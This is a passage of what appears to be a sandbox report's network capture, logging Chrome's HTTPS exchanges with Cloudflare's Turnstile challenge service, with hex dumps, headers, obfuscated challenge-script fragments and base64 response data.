                                                            2024-12-14 09:10:50 UTC1369INData Raw: 73 2e 67 29 5d 2c 43 3d 6b 5b 68 47 28 31 34 37 34 29 5d 28 6b 5b 68 47 28 33 37 31 29 5d 28 74 68 69 73 2e 68 5b 6b 5b 68 47 28 31 30 39 35 29 5d 28 31 33 34 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 2c 6b 5b 68 47 28 37 33 39 29 5d 28 35 34 2b 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 33 34 2e 35 31 5d 5b 31 5d 5b 68 47 28 33 32 32 29 5d 28 74 68 69 73 2e 68 5b 31 33 34 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 32 35 35 29 29 2c 35 29 2c 44 3d 5b 5d 2c 45 3d 30 3b 45 3c 43 3b 44 5b 68 47 28 36 39 34 29 5d 28 74 68 69 73 2e 68 5b 6b 5b 68 47 28 37 34 34 29 5d 28 6b 5b 68 47 28 31 35 31 39 29 5d 28 74 68 69 73 2e 68 5b 31 33 34 2e 39 32 5e 74 68 69 73 2e 67 5d 5b 33 5d 2c 6b 5b 68 47 28 31 31 33 31 29 5d 28 74 68 69 73 2e 68 5b 31 33 34 2e 36 31 5e 74 68
                                                            Data Ascii: s.g)],C=k[hG(1474)](k[hG(371)](this.h[k[hG(1095)](134,this.g)][3],k[hG(739)](54+this.h[this.g^134.51][1][hG(322)](this.h[134^this.g][0]++),255)),5),D=[],E=0;E<C;D[hG(694)](this.h[k[hG(744)](k[hG(1519)](this.h[134.92^this.g][3],k[hG(1131)](this.h[134.61^th
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 5d 3d 67 6d 2c 67 73 5b 67 4a 28 31 32 37 34 29 5d 3d 67 68 2c 67 73 5b 67 4a 28 34 35 39 29 5d 3d 67 6e 2c 67 73 5b 67 4a 28 31 31 31 32 29 5d 3d 67 6b 2c 67 73 5b 67 4a 28 33 32 33 29 5d 3d 67 6a 2c 67 73 5b 67 4a 28 31 30 37 35 29 5d 3d 66 49 2c 67 73 5b 67 4a 28 33 38 38 29 5d 3d 67 66 2c 67 73 5b 67 4a 28 34 36 39 29 5d 3d 67 65 2c 67 73 5b 67 4a 28 34 39 32 29 5d 3d 66 7a 2c 67 73 5b 67 4a 28 37 38 33 29 5d 3d 66 41 2c 67 73 5b 67 4a 28 31 33 31 35 29 5d 3d 66 57 2c 67 73 5b 67 4a 28 33 33 32 29 5d 3d 66 59 2c 67 73 5b 67 4a 28 39 31 30 29 5d 3d 66 58 2c 67 73 5b 67 4a 28 34 39 33 29 5d 3d 67 38 2c 67 73 5b 67 4a 28 31 33 36 35 29 5d 3d 67 37 2c 67 73 5b 67 4a 28 35 34 38 29 5d 3d 67 36 2c 67 73 5b 67 4a 28 31 34 34 32 29 5d 3d 67 35 2c 67 73 5b 67
                                                            Data Ascii: ]=gm,gs[gJ(1274)]=gh,gs[gJ(459)]=gn,gs[gJ(1112)]=gk,gs[gJ(323)]=gj,gs[gJ(1075)]=fI,gs[gJ(388)]=gf,gs[gJ(469)]=ge,gs[gJ(492)]=fz,gs[gJ(783)]=fA,gs[gJ(1315)]=fW,gs[gJ(332)]=fY,gs[gJ(910)]=fX,gs[gJ(493)]=g8,gs[gJ(1365)]=g7,gs[gJ(548)]=g6,gs[gJ(1442)]=g5,gs[g


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.449779104.18.94.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:49 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1218287069:1734164783:svNwVqlgGe--o7-M-DZ4hvYyFzq8ZgbcuaxVIprV47s/8f1d10088a7d4314/BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 3187
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:49 UTC3187OUTData Raw: 76 5f 38 66 31 64 31 30 30 38 38 61 37 64 34 33 31 34 3d 5a 39 41 4f 42 4f 56 4f 4d 4f 52 4f 2d 4f 64 61 4a 63 61 4a 74 76 4f 69 72 4c 57 54 53 72 50 6f 73 4a 43 30 4a 42 47 4f 51 6c 4a 58 4f 54 39 4a 6d 4a 35 50 30 4a 53 68 6a 4f 42 30 4a 6e 4f 53 24 77 74 4a 38 50 4f 4a 53 52 69 4a 56 32 74 4a 54 47 51 32 57 30 55 4f 6a 4a 49 5a 4a 56 36 6a 6c 47 66 41 51 6e 32 6a 47 33 5a 69 4a 78 4a 4a 4e 69 52 77 4f 4a 6e 4a 30 4f 52 64 4e 6c 36 68 32 54 51 48 64 76 39 45 31 38 78 36 76 35 35 54 67 51 41 4a 6d 57 24 50 30 4f 51 77 6c 38 66 32 6b 41 41 41 78 4a 4a 32 73 4f 30 79 30 33 74 33 71 5a 47 2d 4a 41 24 76 7a 69 42 54 32 6b 66 69 54 78 47 4a 37 4f 50 6c 4a 69 77 4d 4a 6d 66 54 72 77 66 2d 4a 50 4e 37 75 42 4a 4a 4e 78 2d 25 32 62 64 31 50 39 4a 42 41 4a 66 4f
                                                            Data Ascii: v_8f1d10088a7d4314=Z9AOBOVOMORO-OdaJcaJtvOirLWTSrPosJC0JBGOQlJXOT9JmJ5P0JShjOB0JnOS$wtJ8POJSRiJV2tJTGQ2W0UOjJIZJV6jlGfAQn2jG3ZiJxJJNiRwOJnJ0ORdNl6h2TQHdv9E18x6v55TgQAJmW$P0OQwl8f2kAAAxJJ2sO0y03t3qZG-JA$vziBT2kfiTxGJ7OPlJiwMJmfTrwf-JPN7uBJJNx-%2bd1P9JBAJfO
                                                            2024-12-14 09:10:50 UTC767INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:50 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 159888
                                                            Connection: close
                                                            cf-chl-gen: pl8hJmYyHDSM6Kgz/NPX9NvnYZAEqUgUK6xYUyTF8OifhxZnVtfS25dE2GQS0z20be3ozkyt9Wro/R3228GOMy6w/QMdFpyBICqAwzwkqWIlDL1Fy6jm8JA86SZmuI2vHgE7L1HpLFZS1FUeDt3HL1uVvWridV7kt1fizRvW09iVmupWTPxBSxLb+G1gWBNxojAEXgjG2NJj0XopoxpbrxdMH6RAoQjdXrWnsWr9d0kW863U2X07FpE4x9FFUJ5Cu3n+AdmfR1NPfIyGLEGMYzUYWcoVs6K0K9jx+BVvkKw2bG+uTBPx3f8Y4GBWY4cQ3dsgfUDbXqI8VSSY/UGGht/7QKycb3bVXFj89ErHmcGjDqD2lSqk9fb7cpB7x8gfjr6QIRcHntbqyAJsCD+urtfUhP984SWruPZTbbUr5whVyaLpZwQIny+NEkMJ+/+ynESlVlJPW+UKTH/aqihA5y5v41qeOh/K13eecP3+uVqYCCDQ7DSRT65V8H9XW7FaBg==$RZpk+hMNLjB6QaC4
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d1022fe033342-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:50 UTC602INData Raw: 6d 33 61 67 69 71 36 4d 66 36 36 57 6e 36 6e 43 6e 4d 71 71 74 59 43 37 7a 63 2b 4f 30 4b 4f 52 78 59 2f 4a 32 4c 76 59 74 4d 79 62 33 36 2f 64 76 4e 6a 66 30 4b 4c 46 6e 37 69 34 36 65 48 6a 78 37 37 64 34 74 4c 65 34 38 44 4a 2b 4f 37 74 2b 76 72 49 74 66 72 76 38 76 7a 66 33 38 44 62 30 73 54 31 75 2b 62 31 77 77 72 69 32 75 77 4b 35 2b 30 4c 43 2b 6b 4a 46 67 50 75 47 76 72 73 36 67 30 41 33 4f 34 52 42 4f 4c 63 46 2f 54 79 35 53 67 56 44 53 45 45 2f 4f 6f 70 4c 75 59 31 4e 50 66 71 4a 51 33 74 47 68 76 33 51 42 31 42 46 77 38 68 52 52 6f 34 4d 77 59 6a 4f 41 4e 4b 4a 53 4e 48 52 43 6b 4c 51 78 4d 70 46 6b 70 46 4e 31 78 49 55 68 59 38 57 53 4a 64 58 55 51 75 5a 43 59 38 50 47 5a 6c 57 57 31 4e 4c 6c 70 48 62 6d 78 64 62 58 68 46 54 6d 78 36 58 58 46
                                                            Data Ascii: m3agiq6Mf66Wn6nCnMqqtYC7zc+O0KORxY/J2LvYtMyb36/dvNjf0KLFn7i46eHjx77d4tLe48DJ+O7t+vrItfrv8vzf38Db0sT1u+b1wwri2uwK5+0LC+kJFgPuGvrs6g0A3O4RBOLcF/Ty5SgVDSEE/OopLuY1NPfqJQ3tGhv3QB1BFw8hRRo4MwYjOANKJSNHRCkLQxMpFkpFN1xIUhY8WSJdXUQuZCY8PGZlWW1NLlpHbmxdbXhFTmx6XXF
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 49 2b 63 47 46 77 50 34 4e 70 65 6e 5a 68 54 6c 2b 47 63 55 31 77 52 6f 4f 47 6a 57 61 48 6d 31 56 55 6c 34 6d 58 58 34 4b 61 67 4a 6c 31 6f 57 53 62 6f 58 69 5a 6d 58 35 36 64 32 79 41 73 59 53 7a 63 5a 64 78 6f 37 61 51 72 5a 4b 77 71 4a 31 2b 69 59 32 43 70 58 65 52 6c 36 4a 2f 70 34 6d 55 75 59 57 33 6e 70 75 64 75 36 36 31 72 4b 47 4f 72 63 50 54 72 73 58 4d 31 5a 79 72 72 4d 33 43 7a 64 58 46 79 61 57 2f 78 63 43 31 31 2b 65 70 32 75 72 78 7a 36 33 75 78 72 4c 46 2b 66 7a 73 33 4e 2f 4c 75 4d 6e 67 33 2b 48 69 2b 67 54 34 2f 74 38 4d 44 67 66 66 43 74 73 53 41 78 50 79 38 65 73 43 39 52 55 45 44 76 6e 6f 48 2b 77 4c 33 66 4d 59 47 2b 44 34 34 42 72 70 2b 69 44 37 2b 51 4c 6f 43 7a 45 47 4b 42 4d 6b 42 2f 41 44 42 77 30 77 4d 50 77 51 2b 45 41 35 46
                                                            Data Ascii: I+cGFwP4NpenZhTl+GcU1wRoOGjWaHm1VUl4mXX4KagJl1oWSboXiZmX56d2yAsYSzcZdxo7aQrZKwqJ1+iY2CpXeRl6J/p4mUuYW3npudu661rKGOrcPTrsXM1ZyrrM3CzdXFyaW/xcC11+ep2urxz63uxrLF+fzs3N/LuMng3+Hi+gT4/t8MDgffCtsSAxPy8esC9RUEDvnoH+wL3fMYG+D44Brp+iD7+QLoCzEGKBMkB/ADBw0wMPwQ+EA5F
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 37 64 6c 64 75 53 6c 35 76 63 6e 43 49 5a 30 64 68 5a 4a 4f 54 65 48 4e 36 66 70 4b 50 56 33 64 62 68 4a 42 77 63 47 56 37 67 71 6d 45 70 32 69 62 69 6f 32 64 6b 6d 2b 48 74 47 36 4b 72 61 4b 49 68 4b 74 36 66 4b 69 64 66 37 62 43 74 34 4e 34 65 5a 4b 71 6b 35 75 38 68 4d 66 44 79 61 53 62 76 63 65 52 71 61 32 6f 6f 63 6d 33 79 36 37 56 76 63 2b 65 72 4e 32 61 34 62 69 5a 70 74 62 59 33 64 69 37 35 37 33 41 75 72 32 79 36 76 62 31 73 38 4b 32 78 4d 76 78 74 76 33 4d 38 76 4c 4c 42 4c 72 38 43 4f 59 4b 78 51 76 64 78 63 33 37 37 65 58 69 35 75 38 48 42 41 37 72 7a 67 2f 36 35 2b 6a 6c 38 64 73 42 37 42 4c 72 48 53 49 59 4b 64 34 42 46 2b 55 67 35 51 67 52 44 2f 77 71 42 79 54 7a 45 2b 30 30 39 78 55 34 4b 66 30 79 4b 6a 4d 6a 41 76 77 54 4a 7a 51 44 42 41
                                                            Data Ascii: 7dlduSl5vcnCIZ0dhZJOTeHN6fpKPV3dbhJBwcGV7gqmEp2ibio2dkm+HtG6KraKIhKt6fKidf7bCt4N4eZKqk5u8hMfDyaSbvceRqa2oocm3y67Vvc+erN2a4biZptbY3di7573Aur2y6vb1s8K2xMvxtv3M8vLLBLr8COYKxQvdxc377eXi5u8HBA7rzg/65+jl8dsB7BLrHSIYKd4BF+Ug5QgRD/wqByTzE+009xU4Kf0yKjMjAvwTJzQDBA
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 5a 70 47 4f 6b 6d 4b 48 6a 57 31 76 6d 59 68 6f 63 59 32 66 6c 33 53 69 65 31 39 38 6c 5a 5a 37 63 32 69 44 5a 58 74 35 61 6d 4b 63 67 35 79 50 6c 5a 65 74 6f 34 52 31 65 4c 65 36 64 59 66 42 69 72 69 4e 6b 37 2b 45 70 36 47 61 71 4a 32 64 77 71 65 5a 6f 4c 4b 52 77 63 53 68 30 4e 47 31 32 64 48 48 6b 36 61 55 74 35 76 57 73 74 53 33 31 75 44 42 33 63 4c 46 35 62 76 45 37 4d 2f 48 79 61 54 76 73 63 62 54 35 2f 62 68 74 50 76 45 30 50 76 48 32 37 50 7a 76 4c 37 42 38 41 4c 47 39 63 66 49 33 75 54 66 2f 4f 63 45 37 39 73 57 7a 4f 6a 79 38 42 44 36 2b 39 55 59 49 42 37 36 39 75 76 77 39 79 66 7a 42 4f 54 32 35 4f 6f 6f 2b 51 2f 71 45 4f 67 75 37 42 51 31 49 69 2f 71 4e 78 48 33 45 42 7a 36 4f 78 37 36 4c 67 44 39 48 78 45 78 46 43 55 46 53 79 6f 41 4a 31 45
                                                            Data Ascii: ZpGOkmKHjW1vmYhocY2fl3Sie198lZZ7c2iDZXt5amKcg5yPlZeto4R1eLe6dYfBiriNk7+Ep6GaqJ2dwqeZoLKRwcSh0NG12dHHk6aUt5vWstS31uDB3cLF5bvE7M/HyaTvscbT5/bhtPvE0PvH27PzvL7B8ALG9cfI3uTf/OcE79sWzOjy8BD6+9UYIB769uvw9yfzBOT25Ooo+Q/qEOgu7BQ1Ii/qNxH3EBz6Ox76LgD9HxExFCUFSyoAJ1E
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 6d 4b 49 56 58 70 6d 6a 4a 43 4b 62 5a 43 63 6b 6e 57 51 63 35 57 61 69 59 61 4b 67 32 70 2f 6d 49 75 4e 62 6f 4b 4f 6b 72 53 77 6b 35 61 34 74 70 53 77 76 61 75 61 6e 58 71 77 64 71 53 33 76 73 47 32 6f 63 57 6b 6e 61 58 46 6a 73 61 68 78 63 32 74 7a 63 4f 4f 6b 63 79 6f 74 5a 6a 4a 71 37 72 63 32 74 33 57 7a 71 4c 66 78 73 61 6d 7a 4d 4c 57 75 4e 72 4c 33 4b 33 43 77 39 4c 42 37 4e 6e 52 36 4e 6a 46 37 4d 37 6f 79 66 43 35 35 4e 4c 30 38 4f 54 63 38 74 4c 2b 39 67 54 62 78 73 6e 4b 33 42 45 50 41 4f 48 77 45 42 54 6b 32 42 51 48 37 4e 30 55 43 76 34 69 45 68 67 45 43 42 73 68 4b 53 6f 42 49 53 45 51 48 79 55 75 42 51 51 42 44 66 4d 57 42 69 34 57 46 6a 44 2b 47 68 30 65 49 42 6f 64 2f 44 77 49 42 79 67 35 42 53 51 37 4c 42 38 4b 51 69 63 4d 4b 6b 63 58
                                                            Data Ascii: mKIVXpmjJCKbZCcknWQc5WaiYaKg2p/mIuNboKOkrSwk5a4tpSwvauanXqwdqS3vsG2ocWknaXFjsahxc2tzcOOkcyotZjJq7rc2t3WzqLfxsamzMLWuNrL3K3Cw9LB7NnR6NjF7M7oyfC55NL08OTc8tL+9gTbxsnK3BEPAOHwEBTk2BQH7N0UCv4iEhgECBshKSoBISEQHyUuBQQBDfMWBi4WFjD+Gh0eIBod/DwIByg5BSQ7LB8KQicMKkcX
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 46 73 6d 6c 2b 69 6b 35 78 33 58 48 47 68 5a 70 4b 73 6e 61 35 67 62 57 79 41 73 34 4e 2f 63 49 39 2f 70 6e 43 74 6a 71 69 64 66 71 74 2b 6e 5a 57 58 6e 4a 43 30 66 70 69 35 75 4c 79 69 6f 72 2b 65 75 36 6a 43 6f 63 61 32 77 72 54 4d 7a 73 62 44 7a 70 6a 47 6e 4d 6d 54 34 75 53 32 6e 4c 79 37 73 4c 7a 6d 34 36 76 44 76 2b 37 63 37 74 33 72 72 39 4b 76 38 4f 2f 4d 38 38 50 33 76 66 61 35 2f 66 6e 2b 34 72 79 39 33 4e 76 56 32 74 50 61 44 4d 50 39 2b 41 66 79 35 39 44 4d 44 50 63 58 30 51 33 58 47 68 54 63 37 4e 30 63 39 2f 44 61 49 67 2f 77 42 50 4d 67 49 67 6b 75 44 75 58 71 4c 52 38 52 4b 75 38 79 37 43 63 71 42 66 58 7a 4d 7a 6b 63 4e 50 30 34 49 76 6f 62 45 42 45 6b 2b 6a 74 49 44 42 67 76 4c 41 6f 4f 52 69 49 78 4a 77 78 50 56 68 51 6d 47 6b 77 34 57
                                                            Data Ascii: Fsml+ik5x3XHGhZpKsna5gbWyAs4N/cI9/pnCtjqidfqt+nZWXnJC0fpi5uLyior+eu6jCoca2wrTMzsbDzpjGnMmT4uS2nLy7sLzm46vDv+7c7t3rr9Kv8O/M88P3vfa5/fn+4ry93NvV2tPaDMP9+Afy59DMDPcX0Q3XGhTc7N0c9/DaIg/wBPMgIgkuDuXqLR8RKu8y7CcqBfXzMzkcNP04IvobEBEk+jtIDBgvLAoORiIxJwxPVhQmGkw4W
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 56 6c 6e 47 42 61 49 57 73 5a 58 35 74 6d 36 69 66 71 33 43 68 67 6f 4f 31 63 71 75 62 63 70 69 77 72 35 75 4f 76 63 43 50 64 72 78 38 71 4c 65 34 76 34 61 6b 6a 49 33 46 69 62 6d 6b 6e 70 2b 4f 71 4d 32 53 30 5a 57 52 75 61 58 5a 70 39 72 54 33 61 37 43 35 4f 48 53 75 39 4c 6e 79 75 7a 6a 76 61 66 66 73 65 6a 4c 76 4d 50 55 77 63 33 52 34 73 32 75 75 64 66 72 79 4e 44 30 30 4d 2f 7a 31 74 6e 64 41 4f 72 62 44 66 76 63 32 76 72 44 7a 65 7a 30 36 78 49 4f 35 51 6e 7a 38 2f 55 50 42 78 6f 69 2b 50 66 7a 4a 53 62 36 48 75 4d 6f 43 75 4d 57 4a 4f 51 77 43 78 77 70 37 67 63 69 42 2f 49 54 45 41 58 34 4c 44 62 35 4e 7a 30 75 44 6a 44 38 47 78 55 64 4d 52 55 7a 51 67 70 4a 4f 68 42 46 47 67 35 46 4c 79 49 58 46 7a 5a 54 4a 31 4a 57 58 6c 42 54 4c 6b 6f 73 55 7a
                                                            Data Ascii: VlnGBaIWsZX5tm6ifq3ChgoO1cqubcpiwr5uOvcCPdrx8qLe4v4akjI3Fibmknp+OqM2S0ZWRuaXZp9rT3a7C5OHSu9LnyuzjvaffsejLvMPUwc3R4s2uudfryND00M/z1tndAOrbDfvc2vrDzez06xIO5Qnz8/UPBxoi+PfzJSb6HuMoCuMWJOQwCxwp7gciB/ITEAX4LDb5Nz0uDjD8GxUdMRUzQgpJOhBFGg5FLyIXFzZTJ1JWXlBTLkosUz
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 68 34 4a 74 6e 6f 53 65 62 4c 53 4f 66 71 43 75 68 48 43 5a 6a 71 6c 36 63 4a 69 34 6c 71 47 6b 6d 63 57 46 6f 4a 71 6a 75 61 71 47 76 4b 47 2b 6a 63 48 47 30 61 61 2f 6f 4d 72 4a 6f 62 43 6f 78 64 4c 4e 6c 38 6e 4b 72 2b 48 42 70 64 58 46 36 64 32 35 36 39 6a 62 7a 73 32 37 78 38 76 53 77 65 69 77 31 74 4c 4c 36 74 7a 7a 36 4f 66 34 79 73 76 73 2f 65 4b 33 31 4d 58 34 2b 38 6a 63 39 65 4c 66 33 4f 58 4d 38 75 6b 45 42 63 67 49 79 68 59 47 42 64 76 6c 38 42 58 2b 33 77 77 67 45 67 58 39 38 68 7a 6d 48 77 59 73 43 69 6e 34 42 44 48 2b 38 2f 49 4f 43 7a 41 59 4f 42 41 76 4b 68 30 57 4b 66 6b 37 48 77 4d 30 45 67 59 63 41 42 49 62 47 69 64 45 51 78 78 4a 4b 54 78 51 50 30 59 6e 46 78 51 6a 4a 7a 70 4a 54 79 63 58 4e 7a 41 34 46 6a 56 62 53 47 49 6f 50 56 4e
                                                            Data Ascii: h4JtnoSebLSOfqCuhHCZjql6cJi4lqGkmcWFoJqjuaqGvKG+jcHG0aa/oMrJobCoxdLNl8nKr+HBpdXF6d2569jbzs27x8vSweiw1tLL6tzz6Of4ysvs/eK31MX4+8jc9eLf3OXM8ukEBcgIyhYGBdvl8BX+3wwgEgX98hzmHwYsCin4BDH+8/IOCzAYOBAvKh0WKfk7HwM0EgYcABIbGidEQxxJKTxQP0YnFxQjJzpJTycXNzA4FjVbSGIoPVN
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 5a 53 74 64 61 4b 58 69 4b 53 56 70 49 79 76 64 62 2b 61 66 71 79 2b 72 5a 58 43 6e 4d 57 64 69 49 53 56 6c 35 71 38 6e 38 43 4c 71 70 4f 4d 79 36 32 71 73 36 72 52 73 37 6d 71 34 4e 75 59 33 4b 75 77 33 74 43 35 32 63 4c 58 79 2b 76 56 71 73 76 4b 32 38 76 64 73 63 48 42 31 39 6e 79 30 2f 57 32 33 73 66 50 73 73 76 61 77 73 2b 2b 7a 38 49 48 41 65 50 66 31 4e 6a 5a 42 75 7a 73 45 67 41 54 35 77 6a 76 41 65 63 4e 44 42 58 58 31 64 6a 71 33 39 7a 64 34 39 63 46 4a 43 45 70 35 50 37 6a 4c 41 34 4e 4d 65 76 70 4c 67 6b 32 46 50 45 68 2b 66 45 53 43 66 51 64 4b 51 6f 74 43 2f 6f 38 52 7a 56 45 4f 67 41 63 48 55 73 2b 51 51 49 6d 55 79 4d 55 4a 6a 4e 46 46 53 6c 61 54 44 64 4c 55 6a 31 4d 51 52 78 4d 56 56 34 76 54 32 41 6a 4e 79 5a 67 58 31 64 6d 4f 43 70 73
                                                            Data Ascii: ZStdaKXiKSVpIyvdb+afqy+rZXCnMWdiISVl5q8n8CLqpOMy62qs6rRs7mq4NuY3Kuw3tC52cLXy+vVqsvK28vdscHB19ny0/W23sfPssvaws++z8IHAePf1NjZBuzsEgAT5wjvAecNDBXX1djq39zd49cFJCEp5P7jLA4NMevpLgk2FPEh+fESCfQdKQotC/o8RzVEOgAcHUs+QQImUyMUJjNFFSlaTDdLUj1MQRxMVV4vT2AjNyZgX1dmOCps


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.449781104.18.95.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:52 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1218287069:1734164783:svNwVqlgGe--o7-M-DZ4hvYyFzq8ZgbcuaxVIprV47s/8f1d10088a7d4314/BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:52 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Sat, 14 Dec 2024 09:10:52 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: 5OrhhjgKvXeyf4k0tm4AmzGhBSLdpWq8vGQ=$fV6GCaYFApIfoYkn
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d1032ad90438d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:52 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.449782104.18.94.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:52 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8f1d10088a7d4314/1734167450210/38132fcd19d973b837eaa64685b9bff3165b028fbc00b715dad7a1e69f88cde0/YfI4Pgqs8xMmOW1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=0
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:53 UTC143INHTTP/1.1 401 Unauthorized
                                                            Date: Sat, 14 Dec 2024 09:10:53 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 1
                                                            Connection: close
                                                            2024-12-14 09:10:53 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4f 42 4d 76 7a 52 6e 5a 63 37 67 33 36 71 5a 47 68 62 6d 5f 38 78 5a 62 41 6f 2d 38 41 4c 63 56 32 74 65 68 35 70 2d 49 7a 65 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gOBMvzRnZc7g36qZGhbm_8xZbAo-8ALcV2teh5p-IzeAAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                            2024-12-14 09:10:53 UTC1INData Raw: 4a
                                                            Data Ascii: J


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.449788104.18.94.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:55 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8f1d10088a7d4314/1734167450211/C0KkzdsRP1tlIpN HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
